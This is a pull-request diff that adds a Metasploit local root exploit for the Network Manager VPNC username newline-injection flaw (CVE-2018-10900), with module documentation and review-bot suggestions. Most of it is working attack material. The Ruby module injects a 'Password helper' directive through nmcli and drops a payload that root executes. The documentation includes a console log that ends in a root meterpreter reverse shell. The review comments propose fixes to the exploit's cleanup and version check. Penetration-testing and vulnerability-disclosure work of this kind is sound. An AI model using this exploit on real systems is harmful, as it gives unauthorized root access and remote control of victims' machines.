Land #10482, Add Network Manager VPNC Privesc
Showing 2 changed files with 239 additions and 0 deletions.
91 changes: 91 additions & 0 deletions
...mentation/modules/exploit/linux/local/network_manager_vpnc_username_priv_esc.md
@@ -0,0 +1,91 @@ | ||
## Description | ||
|
||
This module exploits an injection vulnerability in the Network Manager | ||
VPNC plugin to gain *root* privileges. | ||
|
||
This module uses a new line injection vulnerability in the configured | ||
username for a VPN network connection to inject a `Password helper` | ||
configuration directive into the connection configuration. | ||
|
||
The specified helper is executed by Network Manager as root when the | ||
connection is started. | ||
|
||
Network Manager VPNC versions prior to 1.2.6 are vulnerable. | ||
|
||
|
||
## Vulnerable Application | ||
|
||
This module has been tested successfully with VPNC versions: | ||
|
||
* 1.2.4-4 on Debian 9.0.0 (x64); and | ||
* 1.1.93-1 on Ubuntu Linux 16.04.4 (x64). | ||
|
||
|
||
## Installation | ||
|
||
The following installation instructions are for Ubuntu 16.04.04. | ||
|
||
```sh | ||
# List available network-manager-vpnc packages | ||
apt-cache showpkg network-manager-vpnc | ||
|
||
# Install a vulnerable package | ||
apt-get install network-manager-vpnc=1.1.93-1 | ||
``` | ||
|
||
|
||
## Verification Steps | ||
|
||
1. Start `msfconsole` | ||
2. Get a session | ||
3. Do: `use exploit/linux/local/network_manager_vpnc_username_priv_esc` | ||
4. Do: `set SESSION [SESSION]` | ||
5. Do: `run` | ||
6. You should get a new *root* session | ||
|
||
|
||
## Options | ||
|
||
**SESSION** | ||
|
||
Which session to use, which can be viewed with `sessions` | ||
|
||
**WritableDir** | ||
|
||
A writable directory file system path. (default: `/tmp`) | ||
|
||
|
||
## Scenarios | ||
|
||
``` | ||
msf5 > use exploit/linux/local/network_manager_vpnc_username_priv_esc | ||
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set session 1 | ||
session => 1 | ||
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set verbose true | ||
verbose => true | ||
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > set lhost 172.16.191.188 | ||
lhost => 172.16.191.188 | ||
msf5 exploit(linux/local/network_manager_vpnc_username_priv_esc) > run | ||
[*] Started reverse TCP handler on 172.16.191.188:4444 | ||
[+] nmcli utility is installed | ||
[*] Adding VPN connection... | ||
[*] Uploading payload... | ||
[*] Writing '/tmp/.4FCA0Pp4tw' (237 bytes) ... | ||
[*] Starting VPN connection... | ||
[*] Transmitting intermediate stager...(106 bytes) | ||
[*] Sending stage (861480 bytes) to 172.16.191.201 | ||
[+] Deleted /tmp/.4FCA0Pp4tw | ||
[*] Removing VPN connection... | ||
meterpreter > getuid | ||
Server username: uid=0, gid=0, euid=0, egid=0 | ||
meterpreter > sysinfo | ||
Computer : 172.16.191.201 | ||
OS : Ubuntu 16.04 (Linux 4.13.0-41-generic) | ||
Architecture : x64 | ||
BuildTuple : i486-linux-musl | ||
Meterpreter : x86/linux | ||
meterpreter > | ||
``` | ||
|
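Review bot: the Installation line reads `Ubuntu 16.04.04` while the Vulnerable Application list says `1.1.93-1 on Ubuntu Linux 16.04.4 (x64)`; use one version string (16.04.4). The phrase "tested successfully with VPNC versions" also lists network-manager-vpnc package versions (the install step pins `network-manager-vpnc=1.1.93-1`), not versions of the vpnc client itself, so naming the package there would avoid confusion. Under Options, it would help to state that `WritableDir` must be writable by the session user and reachable by root, since the helper written there (`/tmp/.4FCA0Pp4tw` in the scenario) is executed by Network Manager as root when the connection is started.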
148 changes: 148 additions & 0 deletions
modules/exploits/linux/local/network_manager_vpnc_username_priv_esc.rb
@@ -0,0 +1,148 @@ | ||
## | ||
# This module requires Metasploit: https://metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
class MetasploitModule < Msf::Exploit::Local | ||
Rank = ExcellentRanking | ||
|
||
include Msf::Post::File | ||
include Msf::Post::Linux::Priv | ||
include Msf::Post::Linux::System | ||
include Msf::Exploit::EXE | ||
include Msf::Exploit::FileDropper | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'Network Manager VPNC Username Privilege Escalation', | ||
'Description' => %q{ | ||
This module exploits an injection vulnerability in the Network Manager | ||
VPNC plugin to gain root privileges. | ||
This module uses a new line injection vulnerability in the configured | ||
username for a VPN network connection to inject a `Password helper` | ||
configuration directive into the connection configuration. | ||
The specified helper is executed by Network Manager as root when the | ||
connection is started. | ||
Network Manager VPNC versions prior to 1.2.6 are vulnerable. | ||
This module has been tested successfully with VPNC versions: | ||
1.2.4-4 on Debian 9.0.0 (x64); and | ||
1.1.93-1 on Ubuntu Linux 16.04.4 (x64). | ||
}, | ||
'License' => MSF_LICENSE, | ||
'Author' => | ||
[ | ||
'Denis Andzakovic', # Discovery and exploit | ||
'Brendan Coles' # Metasploit | ||
], | ||
'DisclosureDate' => 'Jul 26 2018', | ||
'References' => | ||
[ | ||
['CVE', '2018-10900'], | ||
['URL', 'http://seclists.org/oss-sec/2018/q3/51'], | ||
['URL', 'https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc'], | ||
['URL', 'https://gitlab.gnome.org/GNOME/NetworkManager-vpnc/commit/07ac18a32b4'], | ||
['URL', 'https://security-tracker.debian.org/tracker/CVE-2018-10900'], | ||
['URL', 'https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-10900.html'], | ||
['URL', 'https://launchpad.net/ubuntu/+source/network-manager-vpnc/0.9.8.6-1ubuntu2.1'], | ||
['URL', 'https://www.debian.org/security/2018/dsa-4253'], | ||
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1605919'], | ||
['URL', 'https://bugzilla.novell.com/show_bug.cgi?id=1101147'] | ||
], | ||
'Platform' => 'linux', | ||
'Arch' => [ARCH_X86, ARCH_X64], | ||
'SessionTypes' => ['shell', 'meterpreter'], | ||
'Targets' => [['Auto', {}]], | ||
'DefaultOptions' => | ||
{ | ||
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', | ||
'WfsDelay' => 10, | ||
'PrependFork' => true | ||
}, | ||
'DefaultTarget' => 0)) | ||
register_options [ | ||
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) | ||
] | ||
end | ||
|
||
def base_dir | ||
datastore['WritableDir'].to_s | ||
end | ||
|
||
def upload(path, data) | ||
print_status "Writing '#{path}' (#{data.size} bytes) ..." | ||
rm_f path | ||
write_file path, data | ||
register_file_for_cleanup path | ||
end | ||
|
||
def upload_and_chmodx(path, data) | ||
upload path, data | ||
cmd_exec "chmod +x '#{path}'" | ||
end | ||
|
||
def check | ||
unless command_exists? 'nmcli' | ||
vprint_error 'Network Manager nmcli utility is not installed' | ||
return CheckCode::Safe | ||
end | ||
vprint_good 'nmcli utility is installed' | ||
|
||
CheckCode::Detected | ||
end | ||
|
||
def exploit | ||
if is_root? | ||
fail_with Failure::BadConfig, 'Session already has root privileges' | ||
end | ||
|
||
if check != CheckCode::Detected | ||
fail_with Failure::NotVulnerable, 'Target is not vulnerable' | ||
end | ||
|
||
@payload_name = ".#{rand_text_alphanumeric rand(10..15)}" | ||
payload_path = "#{base_dir}/#{@payload_name}" | ||
|
||
print_status 'Adding VPN connection...' | ||
vpn_data = [] | ||
vpn_data << '+vpn.data "IKE DH Group = dh2"' | ||
vpn_data << "+vpn.data 'IPSec ID = #{rand_text_alphanumeric 5..10}'" | ||
vpn_data << '+vpn.data "IPSec gateway = 127.0.0.1"' | ||
vpn_data << '+vpn.data "IPSec secret-flags = 4"' | ||
vpn_data << '+vpn.data "Local Port = 0"' | ||
vpn_data << '+vpn.data "NAT Traversal Mode = natt"' | ||
vpn_data << '+vpn.data "Perfect Forward Secrecy = server"' | ||
vpn_data << '+vpn.data "Vendor = cisco"' | ||
vpn_data << '+vpn.data "Xauth password-flags = 4"' | ||
vpn_data << "+vpn.data \"Xauth username = #{rand_text_alphanumeric 5..10}\nPassword helper #{payload_path}\"" | ||
vpn_data << "+vpn.data 'ipsec-secret-type = #{rand_text_alphanumeric 5..10}'" | ||
vpn_data << "+vpn.data 'xauth-password-type = #{rand_text_alphanumeric 5..10}'" | ||
res = cmd_exec "nmcli connection add con-name #{@payload_name} type vpn ifname '*' vpn-type vpnc -- #{vpn_data.join(' ')}" | ||
if res.include? 'Error' | ||
fail_with Failure::Unknown, 'Could not create VPN connection' | ||
end | ||
|
||
res = cmd_exec 'nmcli connection' | ||
unless res.include? @payload_name | ||
fail_with Failure::Unknown, 'Could not create VPN connection' | ||
end | ||
|
||
print_status 'Uploading payload...' | ||
upload_and_chmodx payload_path, generate_payload_exe | ||
|
||
print_status 'Starting VPN connection...' | ||
cmd_exec "nmcli connection up #{@payload_name} & echo " | ||
end | ||
|
||
def cleanup | ||
print_status 'Removing VPN connection...' | ||
res = cmd_exec "nmcli connection delete #{@payload_name}" | ||
unless res.include? 'successfully deleted' | ||
print_warning "Could not remove VPN connection #{@payload_name}" | ||
end | ||
super | ||
end | ||
end |
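Review bot: `cleanup` runs `nmcli connection delete #{@payload_name}` unconditionally, but `@payload_name` is only assigned partway through `exploit`; when the run stops earlier (the `is_root?` or `check` `fail_with` paths), cleanup executes `nmcli connection delete ` with an empty name and prints a misleading "Could not remove VPN connection" warning. Guard it, e.g. `return super unless @payload_name`, and only attempt the delete once `nmcli connection add` has succeeded. Separately, `check` returns `CheckCode::Detected` whenever `nmcli` exists, so the `check != CheckCode::Detected` test in `exploit` never reflects the "versions prior to 1.2.6" condition stated in the description; querying the installed network-manager-vpnc package version (dpkg/rpm) and returning `Appears` or `Safe` accordingly would make `check` meaningful. Minor: the success test for `nmcli connection add` is `res.include? 'Error'`, which depends on English nmcli output.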